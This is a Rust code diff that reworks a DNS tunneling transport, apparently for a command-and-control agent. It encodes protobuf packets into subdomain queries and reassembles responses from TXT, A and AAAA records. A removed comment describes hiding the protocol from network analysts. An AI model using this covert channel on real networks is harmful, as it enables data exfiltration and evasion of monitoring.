- /// This hides the protocol structure from network analysts - fn build_packet( - &self, - pkt_type: char, - seq: usize, - conv_id: &str, - raw_data: &[u8], - ) -> Result { - let max_data_size = self.calculate_max_data_size(); - - let truncated_data = if raw_data.len() > max_data_size { - &raw_data[..max_data_size] - } else { - raw_data - }; + /// Build DNS query subdomain from packet + /// Format: . + /// Base32 data is split into 63-char labels, total length <= 253 chars + fn build_subdomain(&self, packet: &DnsPacket) -> Result { + // Serialize packet to protobuf + let mut buf = Vec::new(); + packet.encode(&mut buf)?; + + // Encode entire packet as Base32 (includes all metadata) + let encoded = Self::encode_data(&buf); - // Build raw packet: [type:1][seq:5][convid:12][raw_bytes...] - let mut packet = Vec::new(); - packet.push(pkt_type as u8); - packet.extend_from_slice(Self::encode_seq(seq).as_bytes()); - packet.extend_from_slice(conv_id.as_bytes()); - packet.extend_from_slice(truncated_data); + // Calculate total length + let base_domain_len = self.base_domain.len(); + let num_labels = (encoded.len() + MAX_LABEL_LENGTH - 1) / MAX_LABEL_LENGTH; + let total_len = encoded.len() + num_labels + base_domain_len; // +num_labels for dots between labels, +1 for dot before base_domain - // Base32-encode entire packet (makes it opaque) - let encoded_packet = Self::encode_base32(&packet); + if total_len > MAX_DNS_NAME_LENGTH { + return Err(anyhow::anyhow!( + "DNS query too long: {} chars (max {}). protobuf={} bytes, encoded={} chars, labels={}, base_domain={} chars. 
Data in packet was {} bytes.", + total_len, + MAX_DNS_NAME_LENGTH, + buf.len(), + encoded.len(), + num_labels, + base_domain_len, + packet.data.len() + )); + } - // Split into DNS labels (63 chars each) + // Split encoded data let mut labels = Vec::new(); - for chunk in encoded_packet.as_bytes().chunks(MAX_LABEL_LENGTH) { - labels.push(String::from_utf8_lossy(chunk).to_string()); + let mut remaining = encoded.as_str(); + while remaining.len() > MAX_LABEL_LENGTH { + let (chunk, rest) = remaining.split_at(MAX_LABEL_LENGTH); + labels.push(chunk); + remaining = rest; + } + if !remaining.is_empty() { + labels.push(remaining); } + // Build final domain: ..... + labels.push(&self.base_domain); Ok(labels.join(".")) } - /// Build init packet with plaintext payload - /// Format (before base32): [i][00000][conv_id][method_code:2][total_chunks:5][crc:4] - fn build_init_packet(conv_id: &str, plaintext_payload: &str) -> Result { - // Build raw packet - let mut packet = Vec::new(); - packet.push(TYPE_INIT as u8); - packet.extend_from_slice(Self::encode_seq(0).as_bytes()); - packet.extend_from_slice(conv_id.as_bytes()); - packet.extend_from_slice(plaintext_payload.as_bytes()); + /// Send packet and get response with resolver fallback + async fn send_packet(&mut self, packet: DnsPacket) -> Result> { + let subdomain = self.build_subdomain(&packet)?; + let query = self.build_dns_query(&subdomain)?; - // Base32-encode entire packet - let encoded_packet = Self::encode_base32(&packet); + // Try each DNS server in order + let mut last_error = None; + for attempt in 0..self.dns_servers.len() { + let server_idx = (self.current_server_index + attempt) % self.dns_servers.len(); + let server = &self.dns_servers[server_idx]; - // Split into DNS labels - let mut labels = Vec::new(); - for chunk in encoded_packet.as_bytes().chunks(MAX_LABEL_LENGTH) { - labels.push(String::from_utf8_lossy(chunk).to_string()); + match self.try_dns_query(server, &query).await { + Ok(response) => { + // Update 
current server on success + self.current_server_index = server_idx; + return Ok(response); + } + Err(e) => { + last_error = Some(e); + // Continue to next resolver + } + } } - Ok(labels.join(".")) + Err(last_error.unwrap_or_else(|| anyhow::anyhow!("All DNS servers failed"))) } - /// Build a DNS query for the specified record type - fn build_dns_query(&self, subdomain: &str, transaction_id: u16, record_type: u16) -> Vec { + /// Try a single DNS query against a specific server + async fn try_dns_query(&self, server: &str, query: &[u8]) -> Result> { + // Create UDP socket with timeout + let socket = UdpSocket::bind("0.0.0.0:0").await?; + socket.connect(server).await?; + + // Send query + socket.send(query).await?; + + // Receive response with timeout + let mut buf = vec![0u8; 4096]; + let timeout_duration = std::time::Duration::from_secs(5); + let len = tokio::time::timeout(timeout_duration, socket.recv(&mut buf)) + .await + .map_err(|_| anyhow::anyhow!("DNS query timeout"))??; + buf.truncate(len); + + // Parse TXT record from response + self.parse_dns_response(&buf) + } + + /// Build DNS query packet + fn build_dns_query(&self, domain: &str) -> Result> { let mut query = Vec::new(); - // DNS Header (12 bytes) - query.extend_from_slice(&transaction_id.to_be_bytes()); // Transaction ID - query.extend_from_slice(&DNS_QUERY_FLAG_STANDARD); // Flags: Standard query - query.extend_from_slice(&[0x00, 0x01]); // Questions: 1 - query.extend_from_slice(&[0x00, 0x00]); // Answer RRs: 0 - query.extend_from_slice(&[0x00, 0x00]); // Authority RRs: 0 - query.extend_from_slice(&[0x00, 0x00]); // Additional RRs: 0 + // Transaction ID + query.extend_from_slice(&[0x12, 0x34]); + // Flags: standard query + query.extend_from_slice(&[0x01, 0x00]); + // Questions: 1 + query.extend_from_slice(&[0x00, 0x01]); + // Answer RRs: 0 + query.extend_from_slice(&[0x00, 0x00]); + // Authority RRs: 0 + query.extend_from_slice(&[0x00, 0x00]); + // Additional RRs: 0 + query.extend_from_slice(&[0x00, 
0x00]); // Question section - let fqdn = format!("{}.{}", subdomain, self.base_domain); - for label in fqdn.split('.') { + for label in domain.split('.') { if label.is_empty() { continue; } query.push(label.len() as u8); query.extend_from_slice(label.as_bytes()); } - query.push(0x00); // End of domain name + query.push(0x00); // End of domain - query.extend_from_slice(&record_type.to_be_bytes()); // Type: TXT/A/AAAA - query.extend_from_slice(&DNS_CLASS_IN.to_be_bytes()); // Class: IN + // Type and Class based on record_type + match self.record_type { + DnsRecordType::TXT => { + // Type: TXT (16) + query.extend_from_slice(&[0x00, 0x10]); + } + DnsRecordType::A => { + // Type: A (1) + query.extend_from_slice(&[0x00, 0x01]); + } + DnsRecordType::AAAA => { + // Type: AAAA (28) + query.extend_from_slice(&[0x00, 0x1c]); + } + } + // Class: IN (1) + query.extend_from_slice(&[0x00, 0x01]); - query + Ok(query) } - /// Parse a DNS response and extract record data (TXT, A, or AAAA) + /// Parse DNS response based on record type fn parse_dns_response(&self, response: &[u8]) -> Result> { - if response.len() < DNS_HEADER_SIZE { - return Err(anyhow::anyhow!("Response too short")); + if response.len() < 12 { + return Err(anyhow::anyhow!("DNS response too short")); } - // Parse header - let answer_count = u16::from_be_bytes([response[6], response[7]]); - if answer_count == 0 { - return Ok(Vec::new()); // Empty response - } + // Read answer count from header + let answer_count = u16::from_be_bytes([response[6], response[7]]) as usize; - // Skip question section - let mut offset = DNS_HEADER_SIZE; + // Skip to answer section + let mut offset = 12; - // Parse domain name in question + // Skip question section while offset < response.len() && response[offset] != 0 { let len = response[offset] as usize; - if len == 0 || offset + len >= response.len() { - break; - } - offset += 1 + len; + offset += len + 1; } - offset += 1; // Skip null terminator - offset += 4; // Skip QTYPE and QCLASS + 
offset += 5; // Skip null terminator, type, and class - // Parse answer section - let mut record_data = Vec::new(); + // Parse all answer records and concatenate data + let mut all_data = Vec::new(); for _ in 0..answer_count { - if offset + 12 > response.len() { - break; - } - - // Skip name (with compression support) - while offset < response.len() { - let b = response[offset]; - if b == 0 { - offset += 1; - break; - } else if (b & DNS_COMPRESSION_PTR_MASK) == DNS_COMPRESSION_PTR_MASK { - // Pointer - offset += 2; - break; - } else { - offset += 1 + (b as usize); - } - } - if offset + 10 > response.len() { - break; - } - - let rtype = u16::from_be_bytes([response[offset], response[offset + 1]]); - offset += 8; // Skip TYPE, CLASS, TTL - let rdlength = u16::from_be_bytes([response[offset], response[offset + 1]]); - offset += 2; - - if rtype == TXT_RECORD_TYPE { - // TXT record - extract text data - let rdata_end = offset + rdlength as usize; - while offset < rdata_end && offset < response.len() { - let txt_len = response[offset] as usize; - offset += 1; - if offset + txt_len <= response.len() && offset + txt_len <= rdata_end { - record_data.extend_from_slice(&response[offset..offset + txt_len]); - offset += txt_len; - } else { - break; - } - } - } else if rtype == A_RECORD_TYPE || rtype == AAAA_RECORD_TYPE { - // A or AAAA record - extract IP address bytes - if offset + rdlength as usize <= response.len() { - record_data.extend_from_slice(&response[offset..offset + rdlength as usize]); - offset += rdlength as usize; - } - } else { - offset += rdlength as usize; + return Err(anyhow::anyhow!("Invalid DNS response format")); } - } - Ok(record_data) - } - - /// Send a single DNS query and receive response, with record type fallback - /// and resolver fallback (when using system resolvers) - async fn send_query(&mut self, subdomain: &str) -> Result> { - use rand::Rng; + // Skip name (2 bytes pointer), type (2), class (2), TTL (4) + offset += 10; - let socket = self - 
.socket - .as_ref() - .ok_or_else(|| anyhow::anyhow!("Socket not initialized"))?; - - // Determine which record types to try - let record_types_to_try: Vec = if self.enable_fallback { - // Try all record types in priority order, but start with preferred - let mut types = Vec::new(); - types.push(self.preferred_record_type); - for &rt in RECORD_TYPE_PRIORITY { - if rt != self.preferred_record_type { - types.push(rt); - } - } - types - } else { - // Only try the preferred record type - vec![self.preferred_record_type] - }; + // Read data length + let data_len = u16::from_be_bytes([response[offset], response[offset + 1]]) as usize; + offset += 2; - // Try each record type - for &record_type in &record_types_to_try { - #[cfg(debug_assertions)] - { - let type_name = match record_type { - TXT_RECORD_TYPE => "TXT", - A_RECORD_TYPE => "A", - AAAA_RECORD_TYPE => "AAAA", - _ => "UNKNOWN", - }; - log::trace!("Attempting DNS query with record type: {}", type_name); + if offset + data_len > response.len() { + return Err(anyhow::anyhow!("Invalid DNS record length")); } - // If using system resolver, try all resolvers in the array - // If using explicit server, only try that one - let resolvers_to_try: Vec = if let Some(ref server) = self.dns_server { - // Explicit DNS server specified - vec![server.clone()] - } else { - // Use resolver array (system + fallbacks) - if self.dns_resolvers.is_empty() { - return Err(anyhow::anyhow!("No DNS resolvers available")); - } - - // Try all resolvers starting from current index - let mut resolvers = Vec::new(); - for i in 0..self.dns_resolvers.len() { - let idx = (self.current_resolver_index + i) % self.dns_resolvers.len(); - resolvers.push(self.dns_resolvers[idx].clone()); - } - resolvers - }; - - // Try each resolver - for (resolver_attempt, target) in resolvers_to_try.iter().enumerate() { - #[cfg(debug_assertions)] - log::trace!( - "Attempting query to resolver {} (attempt {}/{})", - target, - resolver_attempt + 1, - resolvers_to_try.len() 
- ); - - // Generate random transaction ID - let transaction_id: u16 = rand::thread_rng().gen(); - let query = self.build_dns_query(subdomain, transaction_id, record_type); - - // Send query - match socket.send_to(&query, target).await { - Ok(_) => {} - Err(_e) => { - #[cfg(debug_assertions)] - log::trace!("Failed to send query to {}: {}", target, _e); - - // If using resolver array, advance to next resolver - if self.dns_server.is_none() && !self.dns_resolvers.is_empty() { - self.current_resolver_index = - (self.current_resolver_index + 1) % self.dns_resolvers.len(); - } - continue; // Try next resolver - } - } - - // Receive response(s) until we get one with matching transaction ID - let deadline = tokio::time::Instant::now() - + tokio::time::Duration::from_secs(DNS_QUERY_TIMEOUT_SECS); - let mut buf = [0u8; MAX_DNS_PACKET_SIZE]; - let mut timed_out = false; - - loop { - let remaining = deadline.saturating_duration_since(tokio::time::Instant::now()); - if remaining.is_zero() { - // Timeout - try next resolver or record type - timed_out = true; - break; - } - - match tokio::time::timeout(remaining, socket.recv_from(&mut buf)).await { - Ok(Ok((len, _))) => { - // Check if transaction ID matches - if len >= 2 { - let response_id = u16::from_be_bytes([buf[0], buf[1]]); - if response_id == transaction_id { - // Check for DNS error (RCODE in flags) - if len >= 4 { - let rcode = buf[3] & DNS_RCODE_MASK; // Last 4 bits of flags - if rcode != 0 { - // DNS error response - try next resolver - #[cfg(debug_assertions)] - log::trace!( - "DNS error response from {}, RCODE={}", - target, - rcode - ); - break; - } - } - - // Matching response found - match self.parse_dns_response(&buf[..len]) { - Ok(data) => { - // Accept both empty and non-empty responses - // (data packets return empty ACK, others return data) - self.current_record_type = record_type; - - #[cfg(debug_assertions)] - log::trace!("Successful response from {}", target); - - return Ok(data); - } - Err(_e) => { - 
#[cfg(debug_assertions)] - log::trace!( - "Failed to parse response from {}: {}", - target, - _e - ); - break; - } - } - } - // Wrong transaction ID - keep waiting for the right one - #[cfg(debug_assertions)] - log::trace!( - "Ignoring DNS response with mismatched transaction ID: expected {}, got {}", - transaction_id, - response_id - ); - } - } - Ok(Err(_e)) => { - #[cfg(debug_assertions)] - log::trace!("Failed to receive response from {}: {}", target, _e); - break; // Try next resolver - } - Err(_) => { - // Timeout - try next resolver - timed_out = true; + // Parse based on record type + match self.record_type { + DnsRecordType::TXT => { + // TXT records have length-prefixed strings + let mut txt_offset = offset; + while txt_offset < offset + data_len { + let str_len = response[txt_offset] as usize; + txt_offset += 1; + if txt_offset + str_len > offset + data_len { break; } + all_data.extend_from_slice(&response[txt_offset..txt_offset + str_len]); + txt_offset += str_len; } } - - // If we timed out or got an error, advance to next resolver in array - if (timed_out || resolver_attempt < resolvers_to_try.len() - 1) - && self.dns_server.is_none() - && !self.dns_resolvers.is_empty() - { - self.current_resolver_index = - (self.current_resolver_index + 1) % self.dns_resolvers.len(); - - #[cfg(debug_assertions)] - log::trace!( - "Moving to next resolver, now at index {}", - self.current_resolver_index - ); - } - } - } - - // All record types and resolvers failed - Err(anyhow::anyhow!("All DNS record types and resolvers failed")) - } - - /// Send init packet and receive conversation ID from server - /// Init payload: [method_code:2][total_chunks:5][crc:4] - async fn send_init( - &mut self, - method: &str, - total_chunks: usize, - data_crc: u16, - ) -> Result { - let method_code = method_to_code(method); - let temp_conv_id = Self::generate_conv_id(); - - let total_chunks_encoded = Self::encode_seq(total_chunks); - let crc_encoded = Self::encode_base36_crc(data_crc); - 
let init_payload = format!("{}{}{}", method_code, total_chunks_encoded, crc_encoded); - - #[cfg(debug_assertions)] - log::debug!( - "send_init: method={}, total_chunks={}, total_chunks_encoded={}, crc={}, crc_encoded={}, init_payload={}", - method, - total_chunks, - total_chunks_encoded, - data_crc, - crc_encoded, - init_payload - ); - - let subdomain = Self::build_init_packet(&temp_conv_id, &init_payload)?; - - #[cfg(debug_assertions)] - log::debug!("Init packet subdomain: {}.{}", subdomain, self.base_domain); - - for attempt in 0..MAX_RETRIES { - #[cfg(debug_assertions)] - log::debug!( - "Sending init packet, attempt {}/{}, timeout={}s", - attempt + 1, - MAX_RETRIES, - INIT_TIMEOUT_SECS - ); - - match tokio::time::timeout( - tokio::time::Duration::from_secs(INIT_TIMEOUT_SECS), - self.send_query(&subdomain), - ) - .await - { - Ok(Ok(response)) if !response.is_empty() => { - // Check if response is binary chunked indicator - if response.len() >= 4 && response[0] == BINARY_CHUNK_MAGIC { - // Binary chunked indicator format (for A records): - // Byte 0: 0xFF (magic) - // Bytes 1-2: chunk count (uint16 big-endian) - // Byte 3: CRC low byte - for integrity check, only low byte is used due to size constraints - let total_chunks = u16::from_be_bytes([response[1], response[2]]) as usize; - let crc_low = response[3]; - - #[cfg(debug_assertions)] - log::debug!( - "Init response is chunked (binary format), chunks={}, crc_low={}", - total_chunks, - crc_low - ); - - // Fetch conversation ID chunks using temp conv_id - // Pass crc_low as expected_crc - fetch_response_chunks will only check low byte for binary chunking - let conv_id = self - .fetch_response_chunks(&temp_conv_id, total_chunks, crc_low as u16) - .await?; - - let conv_id_str = String::from_utf8_lossy(&conv_id).to_string(); - - #[cfg(debug_assertions)] - log::debug!("Received chunked conversation ID: {}", conv_id_str); - - return Ok(conv_id_str); - } - - let response_str = 
String::from_utf8_lossy(&response).to_string(); - - // Check if response is text chunked indicator - if response_str.starts_with(RESP_CHUNKED) { - // Chunked conversation ID response (for A/AAAA records) - #[cfg(debug_assertions)] - log::debug!("Init response is chunked, parsing metadata"); - - let chunked_info = &response_str[RESP_CHUNKED.len()..]; - let parts: Vec<&str> = chunked_info.split(':').collect(); - - // Check if we have a complete chunked indicator (should have 2 parts: chunks and crc) - if parts.len() != 2 || parts[0].is_empty() || parts[1].is_empty() { - // Incomplete chunked indicator - this can happen with A records - // The indicator itself was truncated, so we need to fetch it - #[cfg(debug_assertions)] - log::debug!("Chunked indicator truncated, response: '{}', fetching full metadata", response_str); - - // For A/AAAA records, the chunked indicator might be split across multiple queries - // We need to piece together the full indicator by making fetch queries - // Use a special approach: concatenate responses until we have valid format - let mut full_indicator = response_str.clone(); - let mut fetch_seq = 0; - - // Try up to MAX_CHUNKED_INDICATOR_FETCHES to get the full indicator - while fetch_seq < MAX_CHUNKED_INDICATOR_FETCHES { - let subdomain = - self.build_packet(TYPE_FETCH, fetch_seq, &temp_conv_id, &[])?; - match self.send_query(&subdomain).await { - Ok(chunk_data) if !chunk_data.is_empty() => { - full_indicator - .push_str(&String::from_utf8_lossy(&chunk_data)); - - // Try to parse again - if let Some(chunked_start) = - full_indicator.find(RESP_CHUNKED) - { - let info = &full_indicator - [chunked_start + RESP_CHUNKED.len()..]; - let parts: Vec<&str> = info.split(':').collect(); - if parts.len() >= 2 - && !parts[0].is_empty() - && !parts[1].is_empty() - { - // We have a complete indicator now - match ( - Self::decode_seq(parts[0]), - Self::decode_seq(parts[1]), - ) { - (Ok(total_chunks), Ok(expected_crc)) => { - #[cfg(debug_assertions)] - 
log::debug!("Reconstructed full chunked indicator: chunks={}, crc={}", total_chunks, expected_crc); - - // Now fetch the actual conversation ID chunks - // Start from fetch_seq + 1 since we already consumed some fetches for metadata - let conv_id = self - .fetch_response_chunks( - &temp_conv_id, - total_chunks, - expected_crc as u16, - ) - .await?; - let conv_id_str = - String::from_utf8_lossy(&conv_id) - .to_string(); - - return Ok(conv_id_str); - } - _ => { - // Keep trying - } - } - } - } - - fetch_seq += 1; - } - _ => break, - } - } - - return Err(anyhow::anyhow!( - "Failed to reconstruct chunked indicator after {} fetches: {}", - fetch_seq, - full_indicator - )); - } - - let total_chunks = Self::decode_seq(parts[0])?; - let expected_crc = Self::decode_seq(parts[1])?; - - // Fetch conversation ID chunks using temp conv_id - let conv_id = self - .fetch_response_chunks(&temp_conv_id, total_chunks, expected_crc as u16) - .await?; - // Trim null bytes that may be padding from A/AAAA record responses - let conv_id_str = String::from_utf8_lossy(&conv_id) - .trim_end_matches('\0') - .to_string(); - - #[cfg(debug_assertions)] - log::debug!("Received chunked conversation ID: {}", conv_id_str); - - return Ok(conv_id_str); - } else { - // Direct conversation ID response (single packet) - // For A/AAAA records, may have null padding - let trimmed = response_str.trim_end_matches('\0').to_string(); - - #[cfg(debug_assertions)] - log::debug!("Received conversation ID: {}", trimmed); - - return Ok(trimmed); - } - } - Ok(Ok(_)) => { - #[cfg(debug_assertions)] - log::warn!( - "Init packet attempt {}: server returned empty response", - attempt + 1 - ); - } - Ok(Err(_e)) => { - #[cfg(debug_assertions)] - log::warn!( - "Init packet attempt {}: send_query failed: {}", - attempt + 1, - _e - ); - } - Err(_) => { - #[cfg(debug_assertions)] - log::warn!( - "Init packet attempt {}: timeout after {}s", - attempt + 1, - INIT_TIMEOUT_SECS - ); + DnsRecordType::A | DnsRecordType::AAAA => { + 
// A records are 4 bytes, AAAA records are 16 bytes - append raw binary + all_data.extend_from_slice(&response[offset..offset + data_len]); } } - if attempt < MAX_RETRIES - 1 { - let delay = BACKOFF_BASE_SECS << attempt; // Exponential backoff: 1s, 2s, 4s, 8s, 16s - #[cfg(debug_assertions)] - log::debug!("Waiting {}s before retry...", delay); - tokio::time::sleep(tokio::time::Duration::from_secs(delay)).await; - } + offset += data_len; } - Err(anyhow::anyhow!( - "Failed to get conversation ID after {} retries", - MAX_RETRIES - )) - } - - async fn send_chunks( - &mut self, - conv_id: &str, - chunks: &[Vec], - total_chunks_declared: usize, - ) -> Result<()> { - for (idx, chunk) in chunks.iter().enumerate() { - // Don't send more chunks than declared in init - if idx >= total_chunks_declared { - #[cfg(debug_assertions)] - log::error!( - "BUG: Attempted to send chunk {} but only declared {} chunks in init packet", - idx, - total_chunks_declared - ); - break; + // For A/AAAA records, data is base32-encoded text that needs decoding + if matches!(self.record_type, DnsRecordType::A | DnsRecordType::AAAA) { + // Trim null bytes from padding in A/AAAA records + while all_data.last() == Some(&0) { + all_data.pop(); } - let subdomain = self.build_packet(TYPE_DATA, idx, conv_id, chunk)?; - self.send_query(&subdomain).await?; + let encoded_str = String::from_utf8(all_data) + .map_err(|e| anyhow::anyhow!("Invalid UTF-8 in A/AAAA response: {}", e))?; + all_data = base32::decode(base32::Alphabet::Rfc4648 { padding: false }, &encoded_str.to_uppercase()) + .ok_or_else(|| anyhow::anyhow!("Failed to decode base32 from A/AAAA records"))?; } - Ok(()) + Ok(all_data) } - /// Send end packet and get server response - async fn send_end(&mut self, conv_id: &str, last_seq: usize) -> Result> { - let subdomain = self.build_packet(TYPE_END, last_seq, conv_id, &[])?; - - for attempt in 0..MAX_RETRIES { - #[cfg(debug_assertions)] - log::debug!( - "Sending end packet, attempt {}/{}", - attempt + 1, 
- MAX_RETRIES - ); - - match tokio::time::timeout( - tokio::time::Duration::from_secs(CHUNK_TIMEOUT_SECS), - self.send_query(&subdomain), - ) - .await - { - Ok(Ok(response)) if !response.is_empty() => { - return Ok(response); - } - _ => { - if attempt < MAX_RETRIES - 1 { - tokio::time::sleep(tokio::time::Duration::from_secs( - BACKOFF_RETRY_DELAY_SECS, - )) - .await; - } - } - } - } + /// Send request and receive response using DNS protocol + async fn dns_exchange(&mut self, request: Req, method_code: &str) -> Result + where + Req: Message + Send + 'static, + Resp: Message + Default + Send + 'static, + { + // Marshal request + let request_data = Self::marshal_with_codec::(request)?; - Err(anyhow::anyhow!( - "Failed to get server response after {} retries", - MAX_RETRIES - )) + // Send raw bytes and unmarshal response + let response_data = self.dns_exchange_raw(request_data, method_code).await?; + Self::unmarshal_with_codec::(&response_data) } - /// Parse server response and handle missing chunks - async fn handle_response( - &mut self, - conv_id: &str, - response: &[u8], - chunks: &[Vec], - retry_count: usize, - ) -> Result> { - // Check if response is binary chunked indicator - if response.len() >= 4 && response[0] == BINARY_CHUNK_MAGIC { - // Binary chunked indicator format (for A records): - // Byte 0: 0xFF (magic) - // Bytes 1-2: chunk count (uint16 big-endian) - // Byte 3: CRC low byte - for integrity check, only low byte is used due to size constraints - let total_chunks = u16::from_be_bytes([response[1], response[2]]) as usize; - let crc_low = response[3]; - - #[cfg(debug_assertions)] - log::debug!( - "Response is chunked (binary format), chunks={}, crc_low={}", - total_chunks, - crc_low - ); - - // Fetch all response chunks - // Pass crc_low as expected_crc - fetch_response_chunks will only check low byte for binary chunking - let data = self - .fetch_response_chunks(conv_id, total_chunks, crc_low as u16) - .await?; - - return Ok(data); - } - - let 
response_str = String::from_utf8_lossy(response); - - // Check response type - if response_str.starts_with(RESP_OK) { - // Success - decode response data - let response_data = &response_str[RESP_OK.len()..]; - return Self::decode_base32(response_data); - } else if response_str.starts_with(RESP_MISSING) { - if retry_count >= MAX_MISSING_CHUNK_RETRIES { - return Err(anyhow::anyhow!( - "Exceeded maximum retries ({}) for missing chunks", - MAX_MISSING_CHUNK_RETRIES - )); - } - - // Missing chunks - parse and resend - let missing_str = &response_str[RESP_MISSING.len()..]; - let missing_seqs: Result> = missing_str - .split(',') - .filter(|s| !s.is_empty()) - .map(|s| Self::decode_seq(s)) - .collect(); - - let missing_seqs = missing_seqs?; - - #[cfg(debug_assertions)] - log::debug!( - "Server reports {} missing chunks: {:?}", - missing_seqs.len(), - missing_seqs - ); - - // Resend missing chunks - for seq in &missing_seqs { - if *seq < chunks.len() { - let subdomain = self.build_packet(TYPE_DATA, *seq, conv_id, &chunks[*seq])?; - self.send_query(&subdomain).await?; - } else { - #[cfg(debug_assertions)] - log::warn!( - "Server requested chunk {} but we only have {} chunks", - seq, - chunks.len() - ); - } - } + /// Send raw request bytes and receive raw response bytes using DNS protocol + /// Used for streaming requests like report_file where data is pre-marshaled + async fn dns_exchange_raw(&mut self, request_data: Vec, method_code: &str) -> Result> { - // Small delay to let resent chunks arrive before sending end packet again - tokio::time::sleep(tokio::time::Duration::from_millis(MISSING_CHUNK_DELAY_MS)).await; + // Calculate chunk size based on DNS limits and base domain + let chunk_size = self.calculate_max_chunk_size(); - // Retry end packet - let last_seq = chunks.len().saturating_sub(1); - let response = self.send_end(conv_id, last_seq).await?; + // Generate conversation ID + let conv_id = Self::generate_conv_id(); + let total_chunks = (request_data.len() + 
chunk_size - 1) / chunk_size; + let data_crc = Self::calculate_crc32(&request_data); - // Recursive retry with incremented counter - return Box::pin(self.handle_response(conv_id, &response, chunks, retry_count + 1)) - .await; - } else if response_str.starts_with(RESP_CHUNKED) { - // Response is chunked - fetch all chunks - // For A/AAAA records, response may be padded with nulls - let chunked_info = response_str[RESP_CHUNKED.len()..].trim_end_matches('\0'); - let parts: Vec<&str> = chunked_info.split(':').collect(); + // Send INIT packet + let init_payload = InitPayload { + method_code: method_code.to_string(), + total_chunks: total_chunks as u32, + data_crc32: data_crc, + }; + let mut init_payload_bytes = Vec::new(); + init_payload.encode(&mut init_payload_bytes)?; + + let init_packet = DnsPacket { + r#type: PacketType::Init.into(), + sequence: 0, + conversation_id: conv_id.clone(), + data: init_payload_bytes, + crc32: 0, + }; - if parts.len() != 2 { - return Err(anyhow::anyhow!("Invalid chunked response format")); - } + self.send_packet(init_packet).await?; - let total_chunks = Self::decode_seq(parts[0])?; - let expected_crc = Self::decode_base36_crc(parts[1])?; - - #[cfg(debug_assertions)] - log::debug!( - "Response is chunked: {} chunks, CRC={}", - total_chunks, - expected_crc - ); - - // Fetch all response chunks - return self - .fetch_response_chunks(conv_id, total_chunks, expected_crc) - .await; - } else if response_str.starts_with(RESP_ERROR) { - return Err(anyhow::anyhow!("Server error: {}", response_str)); + // Send DATA packets + for (seq, chunk) in request_data.chunks(chunk_size).enumerate() { + let data_packet = DnsPacket { + r#type: PacketType::Data.into(), + sequence: (seq + 1) as u32, + conversation_id: conv_id.clone(), + data: chunk.to_vec(), + crc32: Self::calculate_crc32(chunk), + }; + self.send_packet(data_packet).await?; } - Err(anyhow::anyhow!("Unknown server response")) - } + // Send END packet + let end_packet = DnsPacket { + r#type: 
PacketType::End.into(), + sequence: (total_chunks + 1) as u32, + conversation_id: conv_id.clone(), + data: vec![], + crc32: 0, + }; - /// Fetch chunked response from server - /// For binary (A/AAAA): expected_crc is low byte only (0-255) - /// For text (TXT): expected_crc is full 16-bit CRC - async fn fetch_response_chunks( - &mut self, - conv_id: &str, - total_chunks: usize, - expected_crc: u16, - ) -> Result> { - // TXT uses base32-encoded text, A/AAAA use raw bytes - let is_text_chunking = self.current_record_type == TXT_RECORD_TYPE; - - let mut encoded_response = String::new(); - let mut binary_response = Vec::new(); - - // Fetch each chunk - for seq in 0..total_chunks { - let subdomain = self.build_packet(TYPE_FETCH, seq, conv_id, &[])?; - let response = self.send_query(&subdomain).await?; - - if is_text_chunking { - // TXT records: response is "ok:" prefix + base32 data - let response_str = String::from_utf8_lossy(&response); - if !response_str.starts_with(RESP_OK) { + let end_response = self.send_packet(end_packet).await?; + + // Check if END response contains ResponseMetadata (chunked response indicator) + // ResponseMetadata is NOT encrypted - it's plain protobuf + // If response is just "ok", it's a small response and will be in first FETCH + // If response is protobuf metadata, we need multiple FETCHes + if end_response.len() > 2 && end_response != b"ok" { + // Try to parse as ResponseMetadata (plain protobuf, not encrypted) + if let Ok(metadata) = ResponseMetadata::decode(&end_response[..]) { + // Response is chunked - fetch all chunks + let total_chunks = metadata.total_chunks as usize; + let expected_crc = metadata.data_crc32; + + // Fetch all encrypted response chunks and concatenate + let mut full_response = Vec::new(); + for chunk_idx in 0..total_chunks { + // Create FetchPayload with chunk index + let fetch_payload = FetchPayload { + chunk_index: chunk_idx as u32, + }; + let mut fetch_payload_bytes = Vec::new(); + fetch_payload.encode(&mut 
fetch_payload_bytes)?; + + let fetch_packet = DnsPacket { + r#type: PacketType::Fetch.into(), + sequence: (total_chunks as u32 + 2 + chunk_idx as u32), + conversation_id: conv_id.clone(), + data: fetch_payload_bytes, + crc32: 0, + }; + + // Each chunk is encrypted - get raw chunk data + let chunk_data = self.send_packet(fetch_packet).await?; + full_response.extend_from_slice(&chunk_data); + } + + // Verify CRC of the complete encrypted response + let actual_crc = Self::calculate_crc32(&full_response); + if actual_crc != expected_crc { return Err(anyhow::anyhow!( - "Failed to fetch chunk {}: {}", - seq, - response_str + "Response CRC mismatch: expected {}, got {}", + expected_crc, + actual_crc )); } - let chunk_data = &response_str[RESP_OK.len()..]; - encoded_response.push_str(chunk_data); - } else { - // A/AAAA records: response is raw binary data (no prefix) - // Trim null bytes from AAAA padding (16-byte alignment) - let trimmed_end = response - .iter() - .rposition(|&b| b != 0) - .map(|i| i + 1) - .unwrap_or(0); - binary_response.extend_from_slice(&response[..trimmed_end]); - } - } - // Send final fetch to signal cleanup (seq = total_chunks) - let subdomain = self.build_packet(TYPE_FETCH, total_chunks, conv_id, &[])?; - let _ = self.send_query(&subdomain).await; // Ignore response - - #[cfg(debug_assertions)] - if is_text_chunking { - log::debug!( - "Fetched all {} chunks, total encoded size: {}", - total_chunks, - encoded_response.len() - ); - } else { - log::debug!( - "Fetched all {} chunks, total binary size: {}", - total_chunks, - binary_response.len() - ); + // Return the complete reassembled encrypted response data + return Ok(full_response); + } } - // Decode based on chunking type - let decoded = if is_text_chunking { - // TXT: Decode base32 - Self::decode_base32(&encoded_response)? 
